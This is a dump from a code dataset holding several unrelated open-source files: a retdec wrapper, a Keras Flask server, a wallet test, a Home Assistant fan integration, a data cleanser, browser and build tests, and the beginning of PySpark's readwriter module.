hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1277841e08fd645ad660098a4ab6d569cb37a919
| 2,638
|
py
|
Python
|
third_party/retdec-3.2/scripts/retdec-fileinfo.py
|
Fimbure/icebox-1
|
0b81992a53e1b410955ca89bdb6f8169d6f2da86
|
[
"MIT"
] | 521
|
2019-03-29T15:44:08.000Z
|
2022-03-22T09:46:19.000Z
|
third_party/retdec-3.2/scripts/retdec-fileinfo.py
|
Fimbure/icebox-1
|
0b81992a53e1b410955ca89bdb6f8169d6f2da86
|
[
"MIT"
] | 30
|
2019-06-04T17:00:49.000Z
|
2021-09-08T20:44:19.000Z
|
third_party/retdec-3.2/scripts/retdec-fileinfo.py
|
Fimbure/icebox-1
|
0b81992a53e1b410955ca89bdb6f8169d6f2da86
|
[
"MIT"
] | 99
|
2019-03-29T16:04:13.000Z
|
2022-03-28T16:59:34.000Z
|
#!/usr/bin/env python3
"""A wrapper for fileinfo that:
- uses also external YARA patterns,
- is able to analyze archives (.a/.lib files).
"""
import argparse
import subprocess
import sys
import importlib
config = importlib.import_module('retdec-config')
utils = importlib.import_module('retdec-utils')
retdec_archive_decompiler = importlib.import_module('retdec-archive-decompiler')
ArchiveDecompiler = retdec_archive_decompiler.ArchiveDecompiler
sys.stdout = utils.Unbuffered(sys.stdout)
def parse_args():
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('-j', '--json',
dest='json',
action='store_true',
help='Set to forward --json to the archive decompilation script.')
parser.add_argument('--use-external-patterns',
dest='external_patterns',
action='store_true',
help='Should use external patterns')
return parser.parse_known_args()
def get_input_file(unknownargs):
"""Find path to the input file.
We take the first parameter that does not start with a dash. This is a
simplification and may not work in all cases. A proper solution would
need to parse fileinfo parameters, which would be complex.
"""
for arg in unknownargs:
if not arg.startswith('-'):
return arg
return None
def main():
args, unknownargs = parse_args()
input = get_input_file(unknownargs)
# When analyzing an archive, use the archive decompilation script `--list`
# instead of `fileinfo` because fileinfo is currently unable to analyze
# archives.
if input and utils.has_archive_signature(input):
archive_decompiler_args = [input, '--list']
if args.json:
archive_decompiler_args.append('--json')
decompiler = ArchiveDecompiler(archive_decompiler_args)
sys.exit(decompiler.decompile_archive())
# We are not analyzing an archive, so proceed to fileinfo.
fileinfo_params = unknownargs
if args.json:
fileinfo_params.append('--json')
for par in config.FILEINFO_EXTERNAL_YARA_PRIMARY_CRYPTO_DATABASES:
fileinfo_params.extend(['--crypto', par])
if args.external_patterns:
for par in config.FILEINFO_EXTERNAL_YARA_EXTRA_CRYPTO_DATABASES:
fileinfo_params.extend(['--crypto', par])
_, ret, _ = utils.CmdRunner().run_cmd([config.FILEINFO] + fileinfo_params)
sys.exit(ret)
if __name__ == "__main__":
main()
| 29.640449
| 90
| 0.674375
|
1f766fb2fa0946c33e73a72f8e681c6605060b1b
| 4,631
|
py
|
Python
|
rest_api/run_keras_server.py
|
mmstevenson/CritterCounter
|
ecf75292c5e2a7b6f1e1862320e50d0de53965a2
|
[
"MIT"
] | null | null | null |
rest_api/run_keras_server.py
|
mmstevenson/CritterCounter
|
ecf75292c5e2a7b6f1e1862320e50d0de53965a2
|
[
"MIT"
] | null | null | null |
rest_api/run_keras_server.py
|
mmstevenson/CritterCounter
|
ecf75292c5e2a7b6f1e1862320e50d0de53965a2
|
[
"MIT"
] | null | null | null |
# USAGE
# Start the server:
# python run_keras_server.py
# Submit a request via cURL:
# curl -X POST -F image=@dog.jpg 'http://localhost:5000/predict'
# Submita a request via Python:
# python simple_request.py
# import the necessary packages
from keras.applications import ResNet50, MobileNetV2
from keras.preprocessing.image import img_to_array
from keras.applications import imagenet_utils
import tensorflow as tf
from PIL import Image
import numpy as np
import flask
import io
import time
import os
# initialize our Flask application and the Keras model
app = flask.Flask(__name__)
model = None
def load_model():
# load the pre-trained Keras model (here we are using a model
# pre-trained on ImageNet and provided by Keras, but you can
# substitute in your own networks just as easily)
global model
model = ResNet50(weights="imagenet")
# model = MobileNetV2(weights="imagenet")
global graph
graph = tf.get_default_graph()
def prepare_image(image, target):
# if the image mode is not RGB, convert it
if image.mode != "RGB":
image = image.convert("RGB")
# resize the input image and preprocess it
image = image.resize(target)
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
image = imagenet_utils.preprocess_input(image)
# return the processed image
return image
@app.route("/predict", methods=["POST"])
def predict():
# initialize the data dictionary that will be returned from the
# view
start = time.time()
data = {"success": False}
# ensure an image was properly uploaded to our endpoint
if flask.request.method == "POST":
if flask.request.files.get("image"):
# read the image in PIL format
image = flask.request.files["image"].read()
image = Image.open(io.BytesIO(image))
# preprocess the image and prepare it for classification
image = prepare_image(image, target=(224, 224))
# classify the input image and then initialize the list
# of predictions to return to the client
with graph.as_default():
preds = model.predict(image)
results = imagenet_utils.decode_predictions(preds)
data["predictions"] = []
# loop over the results and add them to the list of
# returned predictions
for (imagenetID, label, prob) in results[0]:
r = {"label": label, "probability": float(prob)}
data["predictions"].append(r)
# indicate that the request was a success
data["success"] = True
# Send classification time
data["predict_time"] = time.time() - start
# return the data dictionary as a JSON response
return flask.jsonify(data)
@app.route("/predictFolder", methods=["POST"])
def predict_folder():
# initialize the data dictionary that will be returned from the
# view
start = time.time()
data = {"success": False}
# ensure an image was properly uploaded to our endpoint
if flask.request.method == "POST":
if flask.request.files.get("path"):
for file in os.listdir(path):
# read the image in PIL format
image = flask.request.files["image"].read()
image = Image.open(io.BytesIO(image))
# preprocess the image and prepare it for classification
image = prepare_image(image, target=(224, 224))
# classify the input image and then initialize the list
# of predictions to return to the client
with graph.as_default():
preds = model.predict(image)
results = imagenet_utils.decode_predictions(preds)
data["predictions"] = []
# loop over the results and add them to the list of
# returned predictions
for (imagenetID, label, prob) in results[0]:
r = {"label": label, "probability": float(prob)}
data["predictions"].append(r)
# indicate that the request was a success
data["success"] = True
# Send classification time
data["predict_time"] = time.time() - start
# return the data dictionary as a JSON response
return flask.jsonify(data)
# if this is the main thread of execution first load the model and
# then start the server
if __name__ == "__main__":
print(("* Loading Keras model and Flask starting server..."
"please wait until server has fully started"))
load_model()
app.run(host='0.0.0.0', debug=False)
| 33.078571
| 68
| 0.638523
|
80679119a8a98dc03eb0e9fecaaf0f130ef0225e
| 6,842
|
py
|
Python
|
test/functional/wallet_labels.py
|
fujicoin/fujicoin-0.20.0
|
2bed6d064ce44ada8bf3263fc2138029b78a8011
|
[
"MIT"
] | null | null | null |
test/functional/wallet_labels.py
|
fujicoin/fujicoin-0.20.0
|
2bed6d064ce44ada8bf3263fc2138029b78a8011
|
[
"MIT"
] | null | null | null |
test/functional/wallet_labels.py
|
fujicoin/fujicoin-0.20.0
|
2bed6d064ce44ada8bf3263fc2138029b78a8011
|
[
"MIT"
] | 1
|
2021-07-18T11:40:12.000Z
|
2021-07-18T11:40:12.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2016-2020 The Fujicoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test label RPCs.
RPCs tested are:
- getaddressesbylabel
- listaddressgroupings
- setlabel
"""
from collections import defaultdict
from test_framework.test_framework import FujicoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error
from test_framework.wallet_util import test_address
class WalletLabelsTest(FujicoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
# Check that there's no UTXO on the node
node = self.nodes[0]
assert_equal(len(node.listunspent()), 0)
# Note each time we call generate, all generated coins go into
# the same address, so we call twice to get two addresses w/50 each
node.generatetoaddress(nblocks=1, address=node.getnewaddress(label='coinbase'))
node.generatetoaddress(nblocks=101, address=node.getnewaddress(label='coinbase'))
assert_equal(node.getbalance(), 100)
# there should be 2 address groups
# each with 1 address with a balance of 50 Fujicoins
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 2)
# the addresses aren't linked now, but will be after we send to the
# common address
linked_addresses = set()
for address_group in address_groups:
assert_equal(len(address_group), 1)
assert_equal(len(address_group[0]), 3)
assert_equal(address_group[0][1], 50)
assert_equal(address_group[0][2], 'coinbase')
linked_addresses.add(address_group[0][0])
# send 50 from each address to a third address not in this wallet
common_address = "msf4WtN1YQKXvNtvdFYt9JBnUD2FB41kjr"
node.sendmany(
amounts={common_address: 100},
subtractfeefrom=[common_address],
minconf=1,
)
# there should be 1 address group, with the previously
# unlinked addresses now linked (they both have 0 balance)
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 1)
assert_equal(len(address_groups[0]), 2)
assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
assert_equal([a[1] for a in address_groups[0]], [0, 0])
node.generate(1)
# we want to reset so that the "" label has what's expected.
# otherwise we're off by exactly the fee amount as that's mined
# and matures in the next 100 blocks
amount_to_send = 1.0
# Create labels and make sure subsequent label API calls
# recognize the label/address associations.
labels = [Label(name) for name in ("a", "b", "c", "d", "e")]
for label in labels:
address = node.getnewaddress(label.name)
label.add_receive_address(address)
label.verify(node)
# Check all labels are returned by listlabels.
assert_equal(node.listlabels(), sorted(['coinbase'] + [label.name for label in labels]))
# Send a transaction to each label.
for label in labels:
node.sendtoaddress(label.addresses[0], amount_to_send)
label.verify(node)
# Check the amounts received.
node.generate(1)
for label in labels:
assert_equal(
node.getreceivedbyaddress(label.addresses[0]), amount_to_send)
assert_equal(node.getreceivedbylabel(label.name), amount_to_send)
for i, label in enumerate(labels):
to_label = labels[(i + 1) % len(labels)]
node.sendtoaddress(to_label.addresses[0], amount_to_send)
node.generate(1)
for label in labels:
address = node.getnewaddress(label.name)
label.add_receive_address(address)
label.verify(node)
assert_equal(node.getreceivedbylabel(label.name), 2)
label.verify(node)
node.generate(101)
# Check that setlabel can assign a label to a new unused address.
for label in labels:
address = node.getnewaddress()
node.setlabel(address, label.name)
label.add_address(address)
label.verify(node)
assert_raises_rpc_error(-11, "No addresses with label", node.getaddressesbylabel, "")
# Check that addmultisigaddress can assign labels.
for label in labels:
addresses = []
for x in range(10):
addresses.append(node.getnewaddress())
multisig_address = node.addmultisigaddress(5, addresses, label.name)['address']
label.add_address(multisig_address)
label.purpose[multisig_address] = "send"
label.verify(node)
node.generate(101)
# Check that setlabel can change the label of an address from a
# different label.
change_label(node, labels[0].addresses[0], labels[0], labels[1])
# Check that setlabel can set the label of an address already
# in the label. This is a no-op.
change_label(node, labels[2].addresses[0], labels[2], labels[2])
class Label:
def __init__(self, name):
# Label name
self.name = name
# Current receiving address associated with this label.
self.receive_address = None
# List of all addresses assigned with this label
self.addresses = []
# Map of address to address purpose
self.purpose = defaultdict(lambda: "receive")
def add_address(self, address):
assert_equal(address not in self.addresses, True)
self.addresses.append(address)
def add_receive_address(self, address):
self.add_address(address)
def verify(self, node):
if self.receive_address is not None:
assert self.receive_address in self.addresses
for address in self.addresses:
test_address(node, address, labels=[self.name])
assert self.name in node.listlabels()
assert_equal(
node.getaddressesbylabel(self.name),
{address: {"purpose": self.purpose[address]} for address in self.addresses})
def change_label(node, address, old_label, new_label):
assert_equal(address in old_label.addresses, True)
node.setlabel(address, new_label.name)
old_label.addresses.remove(address)
new_label.add_address(address)
old_label.verify(node)
new_label.verify(node)
if __name__ == '__main__':
WalletLabelsTest().main()
| 38.875
| 97
| 0.652587
|
80ae5d7f6ac2d638e44677cadfdb307ba58f13f8
| 4,018
|
py
|
Python
|
homeassistant/components/bond/fan.py
|
alexciurea/core
|
bbff9ff6a0903cfcd1316b19db4d822b29e74884
|
[
"Apache-2.0"
] | 2
|
2020-09-10T15:36:55.000Z
|
2021-02-26T21:09:56.000Z
|
homeassistant/components/bond/fan.py
|
frnktrgr/core
|
650d61e4f3007d1f7d456713d43fbc30b7396ce6
|
[
"Apache-2.0"
] | 40
|
2020-08-05T17:00:26.000Z
|
2022-03-04T06:01:46.000Z
|
homeassistant/components/bond/fan.py
|
DubhAd/home-assistant
|
30a7d6233924532775ceb2166d3675380bb3776a
|
[
"Apache-2.0"
] | 2
|
2021-01-11T22:51:43.000Z
|
2021-08-29T01:25:04.000Z
|
"""Support for Bond fans."""
import math
from typing import Any, Callable, List, Optional
from bond import DeviceTypes, Directions
from homeassistant.components.fan import (
DIRECTION_FORWARD,
DIRECTION_REVERSE,
SPEED_HIGH,
SPEED_LOW,
SPEED_MEDIUM,
SPEED_OFF,
SUPPORT_DIRECTION,
SUPPORT_SET_SPEED,
FanEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import Entity
from .const import DOMAIN
from .entity import BondEntity
from .utils import BondDevice, BondHub
async def async_setup_entry(
hass: HomeAssistant,
entry: ConfigEntry,
async_add_entities: Callable[[List[Entity], bool], None],
) -> None:
"""Set up Bond fan devices."""
hub: BondHub = hass.data[DOMAIN][entry.entry_id]
fans = [
BondFan(hub, device)
for device in hub.devices
if device.type == DeviceTypes.CEILING_FAN
]
async_add_entities(fans, True)
class BondFan(BondEntity, FanEntity):
"""Representation of a Bond fan."""
def __init__(self, hub: BondHub, device: BondDevice):
"""Create HA entity representing Bond fan."""
super().__init__(hub, device)
self._power: Optional[bool] = None
self._speed: Optional[int] = None
self._direction: Optional[int] = None
@property
def supported_features(self) -> int:
"""Flag supported features."""
features = 0
if self._device.supports_speed():
features |= SUPPORT_SET_SPEED
if self._device.supports_direction():
features |= SUPPORT_DIRECTION
return features
@property
def speed(self) -> Optional[str]:
"""Return the current speed."""
if self._power == 0:
return SPEED_OFF
if not self._power or not self._speed:
return None
# map 1..max_speed Bond speed to 1..3 HA speed
max_speed = self._device.props.get("max_speed", 3)
ha_speed = math.ceil(self._speed * (len(self.speed_list) - 1) / max_speed)
return self.speed_list[ha_speed]
@property
def speed_list(self) -> list:
"""Get the list of available speeds."""
return [SPEED_OFF, SPEED_LOW, SPEED_MEDIUM, SPEED_HIGH]
@property
def current_direction(self) -> Optional[str]:
"""Return fan rotation direction."""
direction = None
if self._direction == Directions.FORWARD:
direction = DIRECTION_FORWARD
elif self._direction == Directions.REVERSE:
direction = DIRECTION_REVERSE
return direction
def update(self):
"""Fetch assumed state of the fan from the hub using API."""
state: dict = self._hub.bond.getDeviceState(self._device.device_id)
self._power = state.get("power")
self._speed = state.get("speed")
self._direction = state.get("direction")
def set_speed(self, speed: str) -> None:
"""Set the desired speed for the fan."""
max_speed = self._device.props.get("max_speed", 3)
if speed == SPEED_LOW:
bond_speed = 1
elif speed == SPEED_HIGH:
bond_speed = max_speed
else:
bond_speed = math.ceil(max_speed / 2)
self._hub.bond.setSpeed(self._device.device_id, speed=bond_speed)
def turn_on(self, speed: Optional[str] = None, **kwargs) -> None:
"""Turn on the fan."""
if speed is not None:
self.set_speed(speed)
self._hub.bond.turnOn(self._device.device_id)
def turn_off(self, **kwargs: Any) -> None:
"""Turn the fan off."""
self._hub.bond.turnOff(self._device.device_id)
def set_direction(self, direction: str) -> None:
"""Set fan rotation direction."""
bond_direction = (
Directions.REVERSE if direction == DIRECTION_REVERSE else Directions.FORWARD
)
self._hub.bond.setDirection(self._device.device_id, bond_direction)
| 31.147287
| 88
| 0.640866
|
34708babd5e99e05f7c0d50d9810ccd54ba8451c
| 153
|
py
|
Python
|
python-solutions/problem001.py
|
omermikhailk/project-euler
|
04f71bcd6b7b664245e01b814138bea9ff0caf5e
|
[
"MIT"
] | null | null | null |
python-solutions/problem001.py
|
omermikhailk/project-euler
|
04f71bcd6b7b664245e01b814138bea9ff0caf5e
|
[
"MIT"
] | 1
|
2020-06-04T08:40:49.000Z
|
2020-06-04T08:40:49.000Z
|
python-solutions/problem001.py
|
omermikhailk/project-euler
|
04f71bcd6b7b664245e01b814138bea9ff0caf5e
|
[
"MIT"
] | null | null | null |
def sum_of_multiples():
return sum([i for i in range(1, 1000) if not i % 3 or not i % 5])
if __name__ == "__main__":
print(sum_of_multiples())
| 21.857143
| 69
| 0.640523
|
ed451df2f815a12510ebfe53cd427b39912f745f
| 359
|
py
|
Python
|
codes/2018-02-26-final.py
|
israelem/aceptaelreto.github.io
|
91ac0586ef504cf4b1dd05eda32def6c39fbb34c
|
[
"MIT"
] | 4
|
2018-05-10T08:51:04.000Z
|
2021-01-13T12:46:15.000Z
|
codes/2018-02-26-final.py
|
israelem/aceptaelreto.github.io
|
91ac0586ef504cf4b1dd05eda32def6c39fbb34c
|
[
"MIT"
] | null | null | null |
codes/2018-02-26-final.py
|
israelem/aceptaelreto.github.io
|
91ac0586ef504cf4b1dd05eda32def6c39fbb34c
|
[
"MIT"
] | 5
|
2018-05-10T08:51:06.000Z
|
2021-12-07T18:04:27.000Z
|
from functools import reduce
if __name__ == '__main__':
numero = int(reduce(lambda x, y: x + y, [x for x in input().split('.')])) + 1
cadena = ''
for x in range(len(str(numero)) - 1, -1, -3):
if x - 3 >= 0:
cadena += str(numero)[x:x - 3:-1] + '.'
else:
cadena += str(numero)[x::-1]
print(cadena[::-1])
| 29.916667
| 81
| 0.487465
|
1f7807fcab40e5a50f6d056a45a136aea7336d95
| 4,491
|
py
|
Python
|
data/nces/cleanser.py
|
mtna/data-public
|
aeeee98d60e545440bab18356120fb4493d0a35b
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 2
|
2020-08-28T21:36:11.000Z
|
2021-05-05T16:34:52.000Z
|
data/nces/cleanser.py
|
mtna/data-public
|
aeeee98d60e545440bab18356120fb4493d0a35b
|
[
"Apache-2.0",
"CC-BY-4.0"
] | null | null | null |
data/nces/cleanser.py
|
mtna/data-public
|
aeeee98d60e545440bab18356120fb4493d0a35b
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 2
|
2020-10-20T00:45:11.000Z
|
2020-10-20T00:47:16.000Z
|
import addfips
import pandas as pd
import numpy as np
variables = {
'NCES School ID': 'school_id_nces',
'State School ID': 'school_id_state',
'NCES District ID': 'district_id_nces',
'State District ID': 'district_id_state',
'Low Grade*': 'grade_low',
'High Grade*': 'grade_high',
'School Name': 'school_name',
'District': 'district_name',
'County Name*': 'county_name',
'Street Address': 'street_address',
'City': 'city',
'State': 'state',
'ZIP': 'zip',
'ZIP 4-digit': 'zip_4_digit',
'Phone': 'phone_number',
'Locale Code*': 'locale',
'Locale*': 'locale_name',
'Charter': 'is_charter',
'Magnet*': 'is_magnet',
'Title I School*': 'is_title_1_school',
'Title 1 School Wide*': 'is_title_1_school_wide',
'Students*': 'cnt_students',
'Teachers*': 'cnt_teachers',
'Student Teacher Ratio*': 'student_teacher_ratio',
'Free Lunch*': 'is_lunch_free',
'Reduced Lunch*': 'is_lunch_reduced'
}
def recode_bool(df, col):
for index, row in df.iterrows():
value = row[col]
if value == True:
df.loc[index, col] = 1
elif str(value) == '–' or str(value) == '†':
df.loc[index, col] = None
else:
df.loc[index, col] = 0
return df
if __name__ == "__main__":
# read the combined raw file
df = pd.read_csv('./data/nces/clean/combined_raw.csv', low_memory=False)
# normalizing nces column names
df.rename(variables, axis="columns", inplace=True)
# creating nces county_fips column from state and county_name values
af = addfips.AddFIPS()
state_fips = []
county_fips = []
for key, value in df['county_name'].items():
state = df['state'][key]
if str(state) == "nan":
state_fips.append(None)
else:
state_fips.append(af.get_state_fips(state))
if str(value) == "nan":
county_fips.append(None)
else:
county_fips.append(af.get_county_fips(value, state))
df['us_state_fips'] = state_fips
df['us_county_fips'] = county_fips
# ensure locale has no decimals
df['locale'] = df['locale'].astype(pd.Int32Dtype())
df['grade_low'] = df['grade_low'].astype(str)
df['grade_high'] = df['grade_high'].astype(str)
df['grade_low'] = df['grade_low'].str.replace('nan','')
df['grade_high'] = df['grade_high'].str.replace('nan','')
# 0 pad any ids that do not match the NCES length
df['school_id_nces'] = df['school_id_nces'].apply(lambda x: '{0:0>12}'.format(x))
df['district_id_nces'] = df['district_id_nces'].apply(lambda x: '{0:0>7}'.format(x))
df['zip'] = df['zip'].apply(lambda x: '{0:0>5}'.format(x))
df['zip_4_digit'] = df['zip_4_digit'].apply(lambda x: '{0:0>4}'.format(x))
df['grade_low'] = df['grade_low'].apply(lambda x: '{0:0>2}'.format(x))
df['grade_high'] = df['grade_high'].apply(lambda x: '{0:0>2}'.format(x))
# cleaning up boolean columns
df['is_charter'] = df['is_charter'].map({'Yes': 1, 'No': 0})
df['is_charter'] = df['is_charter'].astype(pd.Int32Dtype())
df['is_magnet'] = df['is_magnet'].map({'Yes': 1, 'No': 0})
df['is_magnet'] = df['is_magnet'].astype(pd.Int32Dtype())
df['is_title_1_school'] = df['is_title_1_school'].map({'Yes': 1, 'No': 0})
df['is_title_1_school'] = df['is_title_1_school'].astype(pd.Int32Dtype())
df['is_title_1_school_wide'] = df['is_title_1_school_wide'].map({
'Yes': 1, 'No': 0})
df['is_title_1_school_wide'] = df['is_title_1_school_wide'].astype(pd.Int32Dtype())
df['is_lunch_free'] = df['is_lunch_free'].map({'Yes': 1, 'No': 0})
df['is_lunch_free'] = df['is_lunch_free'].astype(pd.Int32Dtype())
df['is_lunch_reduced'] = df['is_lunch_reduced'].map({'Yes': 1, 'No': 0})
df['is_lunch_reduced'] = df['is_lunch_reduced'].astype(pd.Int32Dtype())
# order the variables
df = df[['school_id_nces', 'school_id_state', 'district_id_nces', 'district_id_state', 'grade_low', 'grade_high', 'street_address', 'city', 'us_state_fips', 'us_county_fips',
'zip', 'zip_4_digit', 'phone_number', 'locale', 'cnt_students', 'cnt_teachers', 'student_teacher_ratio', 'is_charter', 'is_magnet', 'is_title_1_school', 'is_title_1_school_wide', 'is_lunch_free', 'is_lunch_reduced']]
# create clean files
df.to_csv(f'./data/nces/clean/nces_schools.csv', header=True, index=False)
| 41.201835
| 237
| 0.613894
|
fa680ab3bea477ad27223105a1c355b8afaed08e
| 1,415
|
py
|
Python
|
test/actions/gyptest-generated-header.py
|
luguocfw/GYP-Tools
|
41414159d032530acbf5e426954e1020ea1aa740
|
[
"BSD-3-Clause"
] | 34
|
2015-01-14T03:21:08.000Z
|
2020-04-26T10:06:56.000Z
|
core/deps/gyp/test/actions/gyptest-generated-header.py
|
K-Constantine/Amaraki
|
e8736e4754af62a8510c3a5db8a72df48f7681a7
|
[
"MIT"
] | 1
|
2019-03-08T08:07:14.000Z
|
2019-03-08T08:07:14.000Z
|
core/deps/gyp/test/actions/gyptest-generated-header.py
|
K-Constantine/Amaraki
|
e8736e4754af62a8510c3a5db8a72df48f7681a7
|
[
"MIT"
] | 29
|
2015-02-13T00:18:53.000Z
|
2021-02-10T23:38:58.000Z
|
#!/usr/bin/env python
# Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that dependencies on generated headers work, even if the header has
a mixed-case file name.
"""
import TestGyp
test = TestGyp.TestGyp()
if test.format == 'android':
# This test currently fails on android. Investigate why, fix the issues
# responsible, and reenable this test on android. See bug:
# https://code.google.com/p/gyp/issues/detail?id=436
test.skip_test(message='Test fails on android. Fix and reenable.\n')
CHDIR = 'generated-header'
test.run_gyp('test.gyp', chdir=CHDIR)
test.build('test.gyp', 'program', chdir=CHDIR)
test.up_to_date('test.gyp', 'program', chdir=CHDIR)
expect = 'foobar output\n'
test.run_built_executable('program', chdir=CHDIR, stdout=expect)
# Change what's written to the generated header, regyp and rebuild, and check
# that the change makes it to the executable and that the build is clean.
test.sleep()
test.write('generated-header/test.gyp',
test.read('generated-header/test.gyp').replace('foobar', 'barbaz'))
test.run_gyp('test.gyp', chdir=CHDIR)
test.build('test.gyp', 'program', chdir=CHDIR)
test.up_to_date('test.gyp', 'program', chdir=CHDIR)
expect = 'barbaz output\n'
test.run_built_executable('program', chdir=CHDIR, stdout=expect)
test.pass_test()
| 31.444444
| 78
| 0.734982
|
3521b64f50fb1f0e17f66c0e376ffd101dae3211
| 663
|
py
|
Python
|
service-workers/service-worker/navigation-preload/resources/chunked-encoding-scope.py
|
ziransun/wpt
|
ab8f451eb39eb198584d547f5d965ef54df2a86a
|
[
"BSD-3-Clause"
] | 8
|
2019-04-09T21:13:05.000Z
|
2021-11-23T17:25:18.000Z
|
service-workers/service-worker/navigation-preload/resources/chunked-encoding-scope.py
|
ziransun/wpt
|
ab8f451eb39eb198584d547f5d965ef54df2a86a
|
[
"BSD-3-Clause"
] | 21
|
2021-03-31T19:48:22.000Z
|
2022-03-12T00:24:53.000Z
|
service-workers/service-worker/navigation-preload/resources/chunked-encoding-scope.py
|
ziransun/wpt
|
ab8f451eb39eb198584d547f5d965ef54df2a86a
|
[
"BSD-3-Clause"
] | 11
|
2019-04-12T01:20:16.000Z
|
2021-11-23T17:25:02.000Z
|
import time
def main(request, response):
use_broken_body = 'use_broken_body' in request.GET
response.add_required_headers = False
response.writer.write_status(200)
response.writer.write_header("Content-type", "text/html; charset=UTF-8")
response.writer.write_header("Transfer-encoding", "chunked")
response.writer.end_headers()
for idx in range(10):
if use_broken_body:
response.writer.write("%s\n%s\n" % (len(str(idx)), idx))
else:
response.writer.write("%s\r\n%s\r\n" % (len(str(idx)), idx))
response.writer.flush()
time.sleep(0.001)
response.writer.write("0\r\n\r\n")
| 31.571429
| 76
| 0.648567
|
4caad8ffc7c876764f557a7dbddaddd2c135a358
| 44,081
|
py
|
Python
|
python/pyspark/sql/readwriter.py
|
leen0304/Spark2.2.0-source-code
|
8b50aa40c70654579ff298814ac917b48654f207
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"PostgreSQL",
"BSD-3-Clause"
] | 675
|
2016-12-21T00:15:05.000Z
|
2022-03-31T07:15:59.000Z
|
python/pyspark/sql/readwriter.py
|
leen0304/Spark2.2.0-source-code
|
8b50aa40c70654579ff298814ac917b48654f207
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"PostgreSQL",
"BSD-3-Clause"
] | 607
|
2016-12-12T21:56:43.000Z
|
2019-11-14T22:21:06.000Z
|
python/pyspark/sql/readwriter.py
|
leen0304/Spark2.2.0-source-code
|
8b50aa40c70654579ff298814ac917b48654f207
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"PostgreSQL",
"BSD-3-Clause"
] | 168
|
2017-01-12T00:47:04.000Z
|
2021-12-02T08:08:10.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
if sys.version >= '3':
basestring = unicode = str
from py4j.java_gateway import JavaClass
from pyspark import RDD, since, keyword_only
from pyspark.rdd import ignore_unicode_prefix
from pyspark.sql.column import _to_seq
from pyspark.sql.types import *
from pyspark.sql import utils
__all__ = ["DataFrameReader", "DataFrameWriter"]
def to_str(value):
"""
A wrapper over str(), but converts bool values to lower case strings.
If None is given, just returns None, instead of converting it to string "None".
"""
if isinstance(value, bool):
return str(value).lower()
elif value is None:
return value
else:
return str(value)
class OptionUtils(object):
def _set_opts(self, schema=None, **options):
"""
Set named options (filter out those the value is None)
"""
if schema is not None:
self.schema(schema)
for k, v in options.items():
if v is not None:
self.option(k, v)
class DataFrameReader(OptionUtils):
"""
Interface used to load a :class:`DataFrame` from external storage systems
(e.g. file systems, key-value stores, etc). Use :func:`spark.read`
to access this.
.. versionadded:: 1.4
"""
def __init__(self, spark):
self._jreader = spark._ssql_ctx.read()
self._spark = spark
def _df(self, jdf):
from pyspark.sql.dataframe import DataFrame
return DataFrame(jdf, self._spark)
@since(1.4)
def format(self, source):
"""Specifies the input data source format.
:param source: string, name of the data source, e.g. 'json', 'parquet'.
>>> df = spark.read.format('json').load('python/test_support/sql/people.json')
>>> df.dtypes
